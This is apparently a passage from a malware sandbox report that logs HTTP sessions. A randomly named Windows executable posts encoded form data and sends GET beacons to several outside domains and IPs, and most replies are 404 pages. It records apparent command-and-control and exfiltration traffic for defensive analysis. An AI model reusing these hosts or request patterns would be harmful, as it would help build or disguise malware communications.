Nov 12, 2024 07:55:38.564527035 CET	533	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 06:55:38 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49981	209.74.64.58	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:55:40.444964886 CET	1782	OUT	POST /khsn/ HTTP/1.1 Host: www.pluribiz.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.pluribiz.life Cache-Control: max-age=0 Content-Length: 1250 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.pluribiz.life/khsn/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 65 56 72 66 2b 71 68 4c 63 35 77 6e 4e 76 67 73 2b 35 6f 41 68 68 49 76 71 70 75 6e 36 38 7a 49 70 6e 5a 7a 50 4d 61 4b 4d 2f 65 71 79 4f 70 6f 47 76 74 33 7a 52 53 50 31 5a 65 4a 6a 52 34 4e 5a 64 74 51 78 2b 6f 57 6c 35 4f 35 61 54 67 68 78 6d 49 47 50 6c 4c 76 6f 75 52 54 47 73 66 78 43 76 59 6d 4c 48 63 57 44 6c 78 32 55 62 64 6d 70 48 42 39 46 77 6a 39 6c 72 79 61 4a 69 52 45 70 30 68 50 6d 51 65 6b 6a 39 78 6e 68 78 6e 34 48 38 31 4a 6b 50 70 54 70 30 73 35 57 34 4c 50 75 78 4e 54 6c 68 4a 56 61 76 36 72 68 50 61 32 76 32 52 32 4e 79 31 37 51 37 5a 6a 4f 7a 30 46 4f 66 6f 57 35 44 63 58 31 33 62 36 54 76 33 50 59 6d 39 37 43 62 53 50 70 38 65 39 70 77 55 74 6e 71 4d 68 53 4d 6e 39 41 6d 71 55 49 65 43 58 70 72 36 77 75 30 79 4b 4a 74 49 65 30 62 63 63 5a 31 35 73 68 49 49 6b 2f 2f 73 67 34 77 53 2f 42 53 59 7a 35 38 30 4a 57 4a 72 72 71 5a 71 33 6c 57 6e 37 48 6c 52 76 6f 46 48 30 71 52 56 43 73 37 67 72 32 54 49 65 67 57 45 55 56 47 36 70 6d 52 37 5a 36 4a 61 68 37 55 6b 43 [TRUNCATED] Data Ascii: m2gpQ=eVrf+qhLc5wnNvgs+5oAhhIvqpun68zIpnZzPMaKM/eqyOpoGvt3zRSP1ZeJjR4NZdtQx+oWl5O5aTghxmIGPlLvouRTGsfxCvYmLHcWDlx2UbdmpHB9Fwj9lryaJiREp0hPmQekj9xnhxn4H81JkPpTp0s5W4LPuxNTlhJVav6rhPa2v2R2Ny17Q7ZjOz0FOfoW5DcX13b6Tv3PYm97CbSPp8e9pwUtnqMhSMn9AmqUIeCXpr6wu0yKJtIe0bccZ15shIIk//sg4wS/BSYz580JWJrrqZq3lWn7HlRvoFH0qRVCs7gr2TIegWEUVG6pmR7Z6Jah7UkC5dt95rNXeFvyiZmClScfXT2Ian7cehNcYwoQYK0sQTGzeGP2Tfrp1Sd9gZLNUdzZDL8b8XS/sVZFgizuVmkwOTMMAQ0fmcQ0KPhKLxpIEfOnP1EZvSXobt0IJ6F448L/V/dkBlFVAYdqG0g8aLqjrWCSkpEKdynv5ziY9gySQVU/eVCTEtOdbBC63IRzIJL02fVbcJOhJtRKE/ou04Fdof+jHnEop8LsOM/m4vFsOdajlz977n4HpC+oe8Fsx8Ig0nmxF5MwNS7GBopHLQMGVzUXlFCnXxYpvMAsUd0g0z9fK+3F9bXymY1l6+ZU9URBJtyfFTciHWvvnjka5iVAgxBbH0iTBw4ylg/hhsL5CSjOS78uDTTuTvPxUySh2loma13508MJLWckRbEk3GdLYEQt5D5nLDcPj+z5GvRd+yrWKpkSnm9ndguwqfBp+So7BM4Uca2kJaFLn1/DrkERPx1XbrwAWuSgtOSk//7UVOvm0SHNk2HM2pjyv27aFeQ+yRhx4wgh4fNTIYxGEIS9MeEYZtAzfQkeXZ7G2mSiB4ScnsQXbZebY5m+fIGLG1A1aRPkrdYIcb1DxcRJCSoV51KvLI0Anjo1Em8MNdvprVfvnN3mdBLtsjiLwkGOmGQFwH5ZyNVO2/xoxsRhEpXToGFcQt7iJJzCWv [TRUNCATED]
Nov 12, 2024 07:55:41.139045954 CET	533	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 06:55:41 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49982	209.74.64.58	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:55:42.988168001 CET	492	OUT	GET /khsn/?m2gpQ=TXD/9ddHP74eJYFExo0CjTUKkcm39u6VsxdqO5O9CqX8y9tdKNpr+RH/ydKFsRdYIeJS6PQWxoGMZT8zvmt3ATvVqoxwavOvPc4jEyVJChxhY6BZ1VVxdG/duJ25EixLuzB68GCTq/xk&KjH=KRIxdVHP60TD8 HTTP/1.1 Host: www.pluribiz.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Nov 12, 2024 07:55:43.662050009 CET	548	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 06:55:43 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49983	85.159.66.93	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:55:48.891779900 CET	746	OUT	POST /k45l/ HTTP/1.1 Host: www.idaschem.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.idaschem.xyz Cache-Control: max-age=0 Content-Length: 218 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.idaschem.xyz/k45l/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 54 47 45 47 4e 41 74 7a 76 58 68 6a 41 38 45 2f 44 42 6d 6f 51 68 4d 54 76 51 4f 74 4d 75 4c 39 4f 65 64 6a 4e 30 77 33 61 4e 70 52 74 7a 67 59 42 58 68 37 63 59 56 57 58 62 4a 38 32 59 37 79 55 62 69 57 34 56 4b 59 77 47 79 67 41 58 53 31 55 33 39 78 44 61 47 4e 50 75 48 39 4d 68 74 76 59 47 62 55 6c 6e 64 71 77 7a 54 59 4a 78 51 7a 6e 30 31 66 68 4e 77 6a 2f 41 67 63 51 6e 39 52 68 47 61 52 57 5a 69 6e 35 47 41 46 50 50 47 35 55 66 4c 61 30 78 53 4a 63 33 43 36 63 31 69 52 77 49 54 6e 7a 64 2b 6d 53 6a 4e 69 45 36 69 54 76 34 4f 7a 35 69 46 52 30 32 79 62 43 72 5a 62 6c 39 77 41 37 6c 6d 2b 78 45 47 75 6e 6c 78 69 41 41 3d 3d Data Ascii: m2gpQ=TGEGNAtzvXhjA8E/DBmoQhMTvQOtMuL9OedjN0w3aNpRtzgYBXh7cYVWXbJ82Y7yUbiW4VKYwGygAXS1U39xDaGNPuH9MhtvYGbUlndqwzTYJxQzn01fhNwj/AgcQn9RhGaRWZin5GAFPPG5UfLa0xSJc3C6c1iRwITnzd+mSjNiE6iTv4Oz5iFR02ybCrZbl9wA7lm+xEGunlxiAA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49984	85.159.66.93	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:55:51.431976080 CET	766	OUT	POST /k45l/ HTTP/1.1 Host: www.idaschem.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.idaschem.xyz Cache-Control: max-age=0 Content-Length: 238 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.idaschem.xyz/k45l/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 54 47 45 47 4e 41 74 7a 76 58 68 6a 42 63 30 2f 46 6d 79 6f 57 42 4d 51 71 51 4f 74 47 4f 4c 78 4f 65 42 6a 4e 78 55 6e 62 2f 39 52 74 58 6b 59 41 56 5a 37 66 59 56 57 44 4c 4a 35 38 34 37 74 55 62 6d 65 34 55 6d 59 77 41 65 67 41 53 75 31 55 41 70 75 43 4b 47 31 52 4f 48 2f 42 42 74 76 59 47 62 55 6c 6a 4e 41 77 77 6a 59 4b 43 49 7a 6e 56 31 63 36 74 77 67 36 41 67 63 42 58 39 76 68 47 61 6e 57 59 2f 41 35 41 4d 46 50 4f 32 35 55 71 33 62 2f 78 53 44 42 48 44 77 56 31 71 61 34 34 33 42 71 2f 32 63 4b 51 39 39 4d 73 6a 78 31 61 43 66 6e 7a 39 71 77 30 57 74 56 4e 45 75 6e 38 30 59 32 48 53 66 75 7a 6a 45 71 33 51 6d 57 36 45 6d 4a 75 76 72 79 54 6e 69 6a 4b 71 34 38 65 6a 33 52 63 77 3d Data Ascii: m2gpQ=TGEGNAtzvXhjBc0/FmyoWBMQqQOtGOLxOeBjNxUnb/9RtXkYAVZ7fYVWDLJ5847tUbme4UmYwAegASu1UApuCKG1ROH/BBtvYGbUljNAwwjYKCIznV1c6twg6AgcBX9vhGanWY/A5AMFPO25Uq3b/xSDBHDwV1qa443Bq/2cKQ99Msjx1aCfnz9qw0WtVNEun80Y2HSfuzjEq3QmW6EmJuvryTnijKq48ej3Rcw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49985	85.159.66.93	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:55:53.991370916 CET	1779	OUT	POST /k45l/ HTTP/1.1 Host: www.idaschem.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.idaschem.xyz Cache-Control: max-age=0 Content-Length: 1250 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.idaschem.xyz/k45l/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 54 47 45 47 4e 41 74 7a 76 58 68 6a 42 63 30 2f 46 6d 79 6f 57 42 4d 51 71 51 4f 74 47 4f 4c 78 4f 65 42 6a 4e 78 55 6e 62 2b 46 52 74 6b 38 59 42 79 31 37 65 59 56 57 66 37 4a 34 38 34 36 78 55 66 79 67 34 55 36 69 77 44 71 67 42 30 61 31 53 30 46 75 49 4b 47 31 5a 75 48 36 4d 68 74 41 59 43 2f 49 6c 6e 70 41 77 77 6a 59 4b 45 4d 7a 75 6b 31 63 34 74 77 6a 2f 41 67 71 51 6e 38 43 68 43 4f 33 57 5a 4b 33 36 77 73 46 4d 75 6d 35 54 49 66 62 32 78 53 46 43 48 43 6c 56 31 33 43 34 34 72 33 71 2b 7a 37 4b 54 74 39 50 4e 4c 75 77 35 65 35 79 69 4e 57 30 57 32 54 43 65 67 68 6c 39 49 34 75 57 2b 45 76 52 37 35 7a 47 59 64 58 2f 68 63 66 66 50 4c 73 6a 44 75 31 76 37 6d 75 65 37 7a 4d 36 65 50 64 45 6e 30 77 48 6d 35 6d 4f 55 42 71 6a 6a 66 35 49 53 52 6a 58 72 76 47 48 4d 6f 2f 39 78 61 51 35 66 47 33 77 63 30 53 4c 6e 6a 2b 4a 52 70 6a 52 49 73 6c 2f 6f 39 79 4e 7a 54 51 6e 32 66 61 74 62 67 4b 34 68 41 78 6b 37 43 46 51 7a 65 53 68 30 48 75 71 79 42 32 6a 35 62 63 75 41 56 48 4e 59 71 [TRUNCATED] Data Ascii: m2gpQ=TGEGNAtzvXhjBc0/FmyoWBMQqQOtGOLxOeBjNxUnb+FRtk8YBy17eYVWf7J4846xUfyg4U6iwDqgB0a1S0FuIKG1ZuH6MhtAYC/IlnpAwwjYKEMzuk1c4twj/AgqQn8ChCO3WZK36wsFMum5TIfb2xSFCHClV13C44r3q+z7KTt9PNLuw5e5yiNW0W2TCeghl9I4uW+EvR75zGYdX/hcffPLsjDu1v7mue7zM6ePdEn0wHm5mOUBqjjf5ISRjXrvGHMo/9xaQ5fG3wc0SLnj+JRpjRIsl/o9yNzTQn2fatbgK4hAxk7CFQzeSh0HuqyB2j5bcuAVHNYqp7OOexVbaVVRt48HXGJ7ar1INpXXBGk2zrF7/XS+WsEhlt1mCPE0VKKbHF9XbJR7rXiAaghN/NfLTjJTYJtpVhjBBoezug40XH5Sz9Vw4vKavjSsGbqrQiO6YqnOdoDQNugTDtd8XfcX56hFJQvI+zhXxYd3YC+pmVzLm7jn3+n8yU5qVXw10kW041ees1PIN0xS3CHKLx7r2X67zNKBbrFuKrP7LKUBKyEWXjmg2lg3rG5qF3F1I22L7vlM/xmDyrcVfDh2Z92mST4DczqKLq0hKv2MmZozwjeO+7tIrsdH03T4M+qpISXbUp7Dphwf6aMC6ZnYlbzQzSn6S2XEMupY54b4Cz4ya7+qIYb9UPP6Z1Bm6qZzacyMaogSvBSeT1G4RfEXvBJOTse5G4tqpIPLOn/yeP3OD+nLfwqca+NG5QLJg8yyfjePXxjqYxgpYgIFhYrkTIAZo7zGdW6kTLxFB3v4B3BqSlnIIpdb8lP3fejdO9+XSpITB+4M1ZwHiCaXUE7iO5vvQm5zpXSk5ZEqaSJteADkyNhLCPct2UIMvp0Vn0CkANV796TN6DdYJRremNiAi/Ru4voB4fOukazNO2ff5Js4GnxOtQXDLFEX2iksQhzQ74Ov71NPB/RUymSCf38QIVQEpXhI7L+7S6Gxzqlh8UfrQq [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49986	85.159.66.93	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:55:56.535279989 CET	491	OUT	GET /k45l/?KjH=KRIxdVHP60TD8&m2gpQ=eEsmO3tqxgZhecFuD1iDKSUxkj6BCtqtHYZ6OUA3SqEwtG4TBmhjXYADabhkz5bgV/61+lmRmR6oEEDWXEosNoiXdOP4Lj5MSzeooDlhyxnqAyQltERXmLQw2Ss2SnlAtV+TG/a37xhv HTTP/1.1 Host: www.idaschem.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Nov 12, 2024 07:55:57.428031921 CET	225	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Tue, 12 Nov 2024 06:55:57 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-11-12T06:56:02.2907846Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49987	20.2.208.137	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:56:05.158337116 CET	737	OUT	POST /g8fb/ HTTP/1.1 Host: www.b2iqd.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.b2iqd.top Cache-Control: max-age=0 Content-Length: 218 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.b2iqd.top/g8fb/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 56 4b 4d 63 43 32 35 2b 4b 67 72 77 42 35 6a 49 62 6b 38 62 78 4b 37 63 49 35 34 75 79 53 31 64 53 61 4f 65 66 43 72 73 50 53 4f 4b 31 58 4b 7a 45 6a 76 56 58 74 61 58 4d 70 6d 77 6c 6c 58 47 39 54 64 48 6b 52 73 77 57 33 35 41 32 77 53 76 33 58 66 59 67 2f 44 54 77 59 5a 67 57 71 6c 4f 2f 42 33 4c 2f 6a 4c 30 41 39 31 64 77 48 77 51 76 46 61 33 78 46 5a 78 7a 38 44 2f 51 45 47 42 6c 62 75 57 31 50 76 6b 54 36 2b 49 78 53 50 2b 62 74 71 6e 48 2f 55 6e 58 6c 6d 61 71 4e 6d 7a 72 70 79 78 6d 59 4a 70 46 47 75 30 4b 63 33 61 35 74 75 79 4b 68 66 6e 4f 50 77 30 5a 4b 68 4c 68 47 76 51 74 68 32 34 6e 53 79 51 66 72 4c 6f 4e 77 3d 3d Data Ascii: m2gpQ=VKMcC25+KgrwB5jIbk8bxK7cI54uyS1dSaOefCrsPSOK1XKzEjvVXtaXMpmwllXG9TdHkRswW35A2wSv3XfYg/DTwYZgWqlO/B3L/jL0A91dwHwQvFa3xFZxz8D/QEGBlbuW1PvkT6+IxSP+btqnH/UnXlmaqNmzrpyxmYJpFGu0Kc3a5tuyKhfnOPw0ZKhLhGvQth24nSyQfrLoNw==
Nov 12, 2024 07:56:06.103704929 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 12 Nov 2024 06:56:05 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49988	20.2.208.137	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:56:07.892558098 CET	757	OUT	POST /g8fb/ HTTP/1.1 Host: www.b2iqd.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.b2iqd.top Cache-Control: max-age=0 Content-Length: 238 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.b2iqd.top/g8fb/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 56 4b 4d 63 43 32 35 2b 4b 67 72 77 41 5a 7a 49 5a 44 6f 62 33 71 37 62 4e 35 34 75 37 79 31 5a 53 61 43 65 66 44 75 30 50 47 69 4b 30 79 32 7a 46 68 58 56 55 74 61 58 59 35 6d 50 71 46 58 52 39 54 5a 50 6b 51 41 77 57 30 46 41 32 78 43 76 32 67 44 62 76 50 44 52 38 34 5a 31 62 4b 6c 4f 2f 42 33 4c 2f 6a 76 65 41 39 39 64 77 32 41 51 73 6b 61 30 38 6c 5a 79 6a 4d 44 2f 43 30 48 70 6c 62 75 34 31 4c 6d 42 54 2b 4f 49 78 57 66 2b 59 35 32 6d 4e 2f 55 74 5a 46 6d 4c 6a 73 36 38 6c 59 66 44 6b 65 35 4d 49 47 79 44 50 71 32 34 6a 50 69 65 55 77 6e 63 4b 4e 55 43 4f 73 38 2b 6a 48 72 49 67 44 43 5a 34 6c 58 36 53 35 71 73 62 50 30 6b 50 79 36 6a 79 77 79 31 64 39 34 4d 61 51 63 56 47 35 34 3d Data Ascii: m2gpQ=VKMcC25+KgrwAZzIZDob3q7bN54u7y1ZSaCefDu0PGiK0y2zFhXVUtaXY5mPqFXR9TZPkQAwW0FA2xCv2gDbvPDR84Z1bKlO/B3L/jveA99dw2AQska08lZyjMD/C0Hplbu41LmBT+OIxWf+Y52mN/UtZFmLjs68lYfDke5MIGyDPq24jPieUwncKNUCOs8+jHrIgDCZ4lX6S5qsbP0kPy6jywy1d94MaQcVG54=
Nov 12, 2024 07:56:08.756526947 CET	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 12 Nov 2024 06:56:08 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49989	20.2.208.137	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
